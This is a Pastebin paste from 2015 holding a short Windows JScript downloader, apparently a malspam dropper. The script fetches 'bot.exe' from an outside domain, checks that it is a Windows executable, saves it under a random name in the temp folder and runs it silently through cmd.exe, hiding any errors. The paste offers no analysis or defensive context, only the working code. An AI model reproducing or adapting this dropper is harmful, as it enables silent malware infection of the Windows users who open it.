Advertisement
bueddl

Untitled

Nov 17th, 2015
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. url = "http://nov19mailmarketing.pw/bot.exe";
  2.  
  3. var shell = new ActiveXObject("WScript.Shell");
  4. var fso = new ActiveXObject("Scripting.FileSystemObject");
  5.  
  6. try {
  7.     var response = fetch(url);
  8.  
  9.     var pe_pos = response.indexOf("MZ\x90\x00");
  10.     if (pe_pos == 0) {
  11.         var stream = new ActiveXObject("ADODB.Stream");
  12.         // GetSpecialFolder(2) = TMP Folder
  13.         var tmp_path = fso.GetSpecialFolder(2) + "\\" + fso.GetTempName();
  14.         stream.Type = 2;
  15.         stream.Charset = "iso-8859-1";
  16.         stream.Open();
  17.         stream.WriteText(response);
  18.         stream.SaveToFile(tmp_path, 2);
  19.         stream.Close();
  20.         shell.run("cmd.exe /c " + tmp_path, 0);
  21.     };
  22. } catch (e) {};
  23.  
  24. function fetch(url) {
  25.     var xhrq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  26.     xhrq.SetProxy(0);
  27.     xhrq.Open("GET", url, 0);
  28.     xhrq.Send();
  29.     if (200 == xhrq.status) {
  30.         return xhrq.responseText
  31.     };
  32. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement